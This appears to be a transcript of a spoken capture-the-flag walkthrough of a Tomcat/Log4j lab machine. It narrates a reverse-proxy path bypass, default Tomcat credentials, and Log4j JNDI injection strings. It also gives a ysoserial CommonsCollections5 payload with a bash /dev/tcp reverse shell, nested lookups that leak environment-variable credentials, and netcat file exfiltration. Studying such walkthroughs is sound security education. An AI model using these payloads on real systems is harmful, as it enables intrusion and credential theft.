What's going on YouTube? This is IPSec. I'm doing LogForge from the UHC December finals, which apparently LogForge is the correct way to pronounce log4j, but I've never heard anyone ever call it that. That being said, this box is Tomcat running behind Apache, and Apache is configured to block access to /manager, host manager, and admin, so it makes getting access to the Tomcat manager interface difficult without a URL parsing bug from 2018. You do that, use the default credential of Tomcat to get into the manager interface, which you try to upload a WAR file, but you can't because the maximum file size is set to 1 byte. However, Tomcat has been configured to use log4j for its logging, so you can do that to get code execution on the box. There is one trick though. It's running an up-to-date version of Java, so you have to use YsoSerial to create a gadget around the common collections payload to do that code execution. On the box, it's running a custom FTP server written in Java, and you decompile it to see that it's putting its credentials in environment variables, so you have to use log4j again to leak that. With that being said, let's jump in. As always, we start with the nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it LogForge, and then the IP address of 192.168.58.165, and I know it's a weird IP address, it's running off my home network, not hacked the box yet, so that's why that is. Looking at the results, we see a few ports are open. They're also filtered ports, but first the open port's SSH on port 22. Its banner tells us it's an Ubuntu server. Then we have HTTP on port 80. It says it's running Apache HTTPD and also Ubuntu. And then we have the filtered ports FTP on 21, and then 8080, which is the alternate HTTP port, which often runs applications. And normally when I see this, I think there's some type of reverse proxy going on because 80 is forwarded to 8080. Additionally, if I only saw SSL, that would also be the case because a lot of people won't put like SSL on Node.js, which may listen on 8080. Instead, they put Nginx or Apache in front of it, put SSL there, and then just forward the traffic to Node.js. So with that being said, let's take a look at what's listening on 192.168.58.165. And we see it's just a page that says UHC, the Ultimate Hacking Championship. I'm going to press Control U, look at the source code to see if there's anything there. We don't really see anything. So if we try going to a different page, I'm going to try like /admin, we get a forbidden. If I do like a page that doesn't exist, we get a weird error message. This is a error message from Apache Tomcat. And if I look at my network, we look at this, look at the response headers, we can see the server says Apache, yet the error message says it's Tomcat. So we do have a case of a reverse proxy going on. And if you look at the orange Tsai presentation from like 2018, I think it's Blackhat, could be DEF CON, but I want to say Blackhat. Breaking parser logic, this one, it goes all into this attack. If we search the presentation for this, we can see it. I'm sure if you search ipsec.rocks, there's another box that does this. But essentially, we send it this on Apache, and Apache is going to kind of ignore it, but it'll still be sent to Tomcat. So let's just do this out, and as I do it, it may make more sense. So I'm going to do /manager. And we see it is forbidden because Apache set up to block access to the Tomcat manager. Now, if I do ipsec, which doesn't exist, but we do /:, then manager, we actually have to put a trailing slash on that. So ipsec /:, manager, then a trailing slash so a browser doesn't do path normalization and get rid of all that. It asks for a credential. So now we could log in with default credentials of Tomcat and log in. There's also something else in that presentation that talks about doing it a different way, and that is just a semicolon name is equal to anything, and then /manager is another bypass. I probably forgot to do that again. So name, please subscribe, manager, always remember the trailing slash, and we get in. So what's happening here is Apache is set up to say anything that begins with manager, forbid, because we don't want to allow remote access. What's happening is we put this semicolon name equals please subscribe, and Apache reads this as a URL. But when it makes its way to Tomcat, Tomcat's like, well, this isn't a URL, and gets rid of it, and then goes down the normal route logic and says, oh, you wanted to go to manager HTML. So that's what's going on there. The default creds to Tomcat is always Tomcat, so we can log in and see just default credentials. The first thing whenever you log into a Tomcat instance is probably try to deploy a WAR file. So the easiest way to do that is through msfvenom. So we do msfvenom-p java JSP shell reverse TCP. lhost is equal to my IP address. So let's get that. 192.168.58.230. L port, that'll be 9001. Format is a WAR file and -o shell.war. And not word, war. And if you want to know more about that, I'd highly recommend going to ipsec.rocks. If you type like WAR file, we can see in the Jerry file, we manually created this without using msfvenom. With the file generated, we can now go over to Tomcat and try to deploy it. So we try to deploy shell.war. And we get a fail message. If we look over, we can see its maximum size available to upload is set to 1 byte. So good luck finding something to download and execute that is under 1 byte big. We got to find a different option. And Tomcat is a Java application, and while it's not default vulnerable to Log4j because it doesn't use it, there is a way to configure Tomcat to use Log4j. And if we Google it, we can see it is a supported thing here. So if someone decided to have Tomcat use Log4j, then it suddenly becomes vulnerable. So let's try that payload. I'm going to type it in a terminal so we don't have any weird line wrapping, but it's JNDI, then LDAP, then IP address. So 192.168.58.230, and then any port you want, and we can say please subscribe. So we can send this on over. Copy. We can put it in any field we want. And of course, we need to listen on 9001. Send it, and we see the server hangs because it went to Netcat. Now, the weird thing is, we don't see please subscribe because it's trying to complete some type of handshake before it sends that URL because it's not HTTP. It's this weird JNDI LDAP protocol. So we can't just get this parameter of please subscribe easily, but we will show that at the end of the video because that's involved in the privask. Instead, I want to just get code execution on this. And if we Googled JNDI-Exploit-Kit, Twitter, currently it goes to this post. I'm sure like if you're doing this a month after I record, this will no longer be the first result. But this post says everything we need to do. It uses YsoSerial-Modified with some parameters, and then sets up this JNDI server and gets code execution. So let's just do that. First, we have to understand what the difference between YsoSerial and YsoSerial-Modified is. So let's just go to the page, and if you read the description, he talks about it right here that says the default YsoSerial does some weird things, so like redirections don't work, and this makes it harder for us to do things like a reverse shell. This is a solution to that, so that's why we use this. It's mainly for like making the reverse shell or the options more compatible with reverse shell. So let's git clone this, and then the other thing is the JNDI-Exploit-Kit, GitHub, and we want to download this. So let's go into YsoSerial-Modified because we first have to create the payload. I'm going to go into target, java -jar, YsoSerial-H for help, and that doesn't work. Let's just try the -modified version. Okay, awesome. So we have this, so we want to do a payload, and common collections is always a good starting point. Now he did 5 in a screenshot, so that's the one I'm going to do. If 5 didn't work, I would probably try 4. That may sound illogical, but this is testing against common collections version 3.1, and 4 would be version 4.0. So that's why I would actually try 4 next, but I just try a bunch of these. So let's do commons collections 5, and then bash, and then a reverse shell. So bash-i dev tcp 192.168.58.230, I think is my IP. 9001, 0 at and 1, like that. Now you may be thinking, why don't I do the bash-c before this? And that's because we know bash is already be calling this because of this parameter. And then the next thing we do is just write the payload. So let's write that to UHC LogForge. Then we'll call this cc5.ser for serialized object, and cc5 is for common collections 5. I'm going to do less just to view it. We see it begins with ACED, which is the magic bytes for Java serialized object, and it has a bunch of Java E things. So that looks fine. The main reason I did it is I saw all these warnings, so I want to make sure it actually wrote something. So the next piece to this is the JNDI-Exploit-Kit. So we go here, go to target, and then java-jar JNDI-Exploit-Kit. Let's see, snapshot, try all, -h, looks like it works. So what parameters do we need? We need to stand up a LDAP server. And before I get too far down, I just want to make sure my IP address is what I thought it was. 230, that is correct. So we can say 192.168.58.230, because that's where we want the listener. And then 1389, because that's the port for the LDAP. And -p for the serialized object we want to send. I'm going to send UHC LogForge cc5.serialized or .ser. So this is now listening, and we see various JDK versions. Now I'm going to assume Tomcat is installed with APT or a package manager. It's probably running the latest version of Java. So we're going to try this URL. If this doesn't work, I'd probably just go up the list. We can also, as we'll see later in the video, extract the exact Java version that's running, but let's just try this. I'm going to go back into my directory and see LVNP 9001. Go back to this. Do we have this JNDI payload still set up? We do. Get rid of, please. Let's just type it. So JNDI, LDAP. I copied some of it. Go back here. Grab this. Boom. So that's going to be the payload we want to send. Send it. We have it send an object, and we get a shell on the box. So I'm going to do python 3-c import pty.spawn bin bash. So we have a proper terminal set up, and then stty raw -echo ;fg. Hit enter twice so we get back on it. And then like exporting term is equal to xterm, so I can clear the screen. And the first thing I want to do is look at those filtered ports, namely 21 that we couldn't see on nmap. So I'm going to do sslntp to show open ports, grep on 21, and we do see it is indeed running. So I'm going to do ps-ef, and then I'm going to search for FTP, and we see it is running. And we could also, if we wanted to, trace like the parent process. So this is PID, this is parent. So this parent process 1143. This process, parent process 1142, and we can go up to see all of these are related. So cron runs, it executes bash, which executes a script. That script executes Java. We could also do the -- forced flag, and it's truncating this. I think if we fixed a terminal, it would work, but looking at this, we can see it visualized this way. And out of curiosity, stty-a, we want to set rows 26, columns 185. So stty rows 26, cols, I always can't remember that, 105. Like that. And now we see more of the output. So our terminal is somewhat fixed. We could probably do less -S. And let's see, do we have the entire thing? Yeah, if we hit the right arrow, we could see other things. So here's that cron. We can see cron runs, cron starts, and it goes down this chain, and hit right to see the rest. But that's not really that important. What is important is we know that Java is running, and it's running the FTP server. So we should test FTP localhost. Tested this is vulnerable to Log4j. So JNDI, LDAP, then 192.168.58.230, 9001. We can say please subscribe. Doesn't really matter what we put here. NCLVNP 9001, and we get a connection. So we know this Java server is vulnerable. Now the issue with this, and we're not going to do too much troubleshooting, is it doesn't have any vulnerable gadgets that YsoSerial knows about, so we can't just use like common collections and exploit it that way. Additionally, it's running a up-to-date version of Java, so we can't just do the traditional build a Java class and have it execute that way. This challenge, we need to get the source code of it, or actually we can go into a fun unintended solution real quick. I had just Googled like Java FTP server and then asked Rayhan, who is one of the challenge content creators of Hack the Box, who's more familiar with Java than me, if he wouldn't mind adding Log4j in the application. And we did that to make this vulnerable service. We didn't test that the application we based everything off of wasn't vulnerable to begin with. And if we just log in with something, it looks like we failed, but we didn't. We do dir, we are now in root's home directory, and we could get root.txt. So that was a hilarious vulnerability, unintended, that we decided to leave in. It was found after the UHC competition, but the intended way is to see that the jar file is on the root of the server, and we can read that. So nclvnp 9001 will write to ftp server.jar, and then we will nc 192.168.58.230, which is my IP address, on 9001, and direct that FTP server to that netcat socket. Then let it run for a few seconds, trust that it's finished copying, and MD5 sum the file. So we MD5 sum it to make sure we copy the whole thing. And we see AB starts with and ends with AE, starts with AB, ends with AE, so we assume this is the correct file. Now, my favorite way for decompiling this right now is just JD-GUI. So I'm going to execute JD-GUI.jar, and I'm sure if you go to ipsec.rocks, you'll be able to find a bunch of other ways to do it, like JAD and things like that. So let's open the jar file. Just go to open, ftp server.jar, and we can see the log4j files here, but also we have this FTP server. If I go to the server.class, we can see it's pretty much just turning up the socket. If we go to worker.class, scroll down, we see two interesting variables, FTP user and FTP password. So if we extract these variables, we should be able to log into the FTP server normally. Now, this is a harder task on Hack the Box because we don't have internet. Normally, you could just put this in a subdomain and use a website like Canary Tokens, so canarytokens.org, I think, and generate a log4shell token, and it would work. You can't do a DNS token because if you do this, let's do a test real quick. The DNS token is completely static, so you don't really get any information out of it. But the Canary Tokens log4shell token is a bit different than DNS. And if we do this here, it gives us a way to put data into it. So here we just replace hostname with env:/ftp_user, and when we view our tokens, we would be seeing it. I think Huntress Labs also has something similar, but for this video, we're just going to focus on extracting it. Now, we know that the JNDI-Exploit-Kit has the capability to view URLs because that's how it differentiates between versions. And at the beginning of the video, we said we couldn't just do it with netcat because we don't complete the handshake. Now, the issue is the JNDI server isn't verbose enough, and if we requested like please subscribe, it doesn't say a request for please subscribe happened. So we could either modify the JNDI exploit server or exploit kit or whatever it's called, or we can just use Wireshark. So I'm going to just do Wireshark. So let's open up a new pane, sudo Wireshark. And I won't listen yet. Let's get ready to send the payload. Let's see. This is the pane I want. So we're connecting 138.9, and we want to do a nested JNDI, which it does support. And I think we just do sys:\env, or env: FTP user. The sys would be able to get like the user this is running as in the Java version, I think. But let's do FTP user, copy, and we will hit enter a few times here so we know something connected. And I'm just going to do FTP localhost, paste this exploit in, and then stand up Wireshark, hit enter, and then tcp.port is equal to 1389, and then follow stream, and we can see it requested IPsec. So the FTP user is probably IPsec. So let's get ready to do this again. But this time we want to do FTP pass. So we got to copy the payload. And it's FTP password, not pass. Paste password, 2 semicolons. Our Wireshark should now be running. It's on TCP stream none. 1389. Let's hit enter. And we have a connection. We can follow TCP stream. And we see the password is log4j env leakage. So let's try logging in. FTP localhost. If we don't specify anything, it tells us we're not logged in immediately, or an invalid user. So if we do IPsec, username is okay, needs a password. Paste in the password, and we have now logged in, and we could write an SSH key or get root.txt that way. So that'll be, actually not the video. I did say we'd go and explore like the class path and things like that. So let's go do that. First, let's go copy the skeleton of our exploit. So we can just copy up to here, and we can do sys java.class.path. And then I'm going to do 4 dots. We can do sys dot, not sys, I think just java : version, 4 dots. And we can say java : OS. So this should get us a lot of information about exploiting an application. And it should be separated by 4 periods. So if we screwed up any, we'll see it's just blank. So let's copy this. FTP localhost, set up Wireshark again, and see if we do all 3 of these in one big swoop. So TCP stream is equal to 1389. That one on my clipboard, that's annoying. Copy, paste. Maybe that did not work. Oh, I forgot to end the JNDI. We need 2 brackets. Like that. Huh. Wonder if I can't do all this nesting. Let's just stop it at Java class path. And one of these could actually be wrong. And if one of them is wrong, maybe that's what stops it. So we're connecting. Login failed. So we got this. Follow TCP stream. And we can see there's probably no class path. It's probably just the jar. So that's why common collections is not there. Let's see, log TCP port is equal to 1389. We should restart this. And do I still have that on my clipboard? I do. Let's go over to Tomcat and see what this looks like. Wireshark. Do I not have two brackets closing it? There we go. Follow TCP stream. And we can see Tomcat's class path. So an actual Java application does normally have a class path. We can take a look at the other ones we try to do. So the other one was Java : version. Did I do that right or maybe not? So let's try that. I did not put this in the user. Log in. TCP port. We look at this, follow TCP stream. That was weird. I'm going to restart this. So copy this, paste. We can say TCP port 1389, follow stream, and we get the Java version 11. And this is OpenJDK, so OpenJDK 11 is Oracle Java 8. A little bit of Googling would have told you that. So that's how we know to use the JDK 8 payload earlier. We could also try the OS. So let's restart Wireshark, continue without saving, TCP stream. And then after the OS, we will call it a video. OS, copy, follow stream. We can see the exact Linux OS, or what it thinks, or at least the kernel. So that'd be the video. Hope you guys enjoyed it. Take care, and I will see you all next time.